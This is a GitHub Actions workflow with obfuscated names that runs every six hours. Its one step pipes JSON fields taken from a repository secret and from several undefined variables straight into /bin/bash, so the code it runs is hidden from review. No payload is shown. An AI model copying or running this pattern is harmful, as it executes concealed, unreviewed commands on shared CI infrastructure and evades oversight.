name: liulijun1819

on:
  workflow_dispatch:
  schedule:
    - cron: '4 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liulijun1819
        env:
          cz0: ${{ secrets.cz0 }}
        run: |
          echo $cz0 | jq -r .xkh5 | /bin/bash
          echo $ph89 | jq -r .t31 | /bin/bash
          echo $wwq59 | jq -r .rxl19599 | /bin/bash
          echo $e50709 | jq -r .zmng7 | /bin/bash
          echo $bie36 | jq -r .ugk69555 | /bin/bash

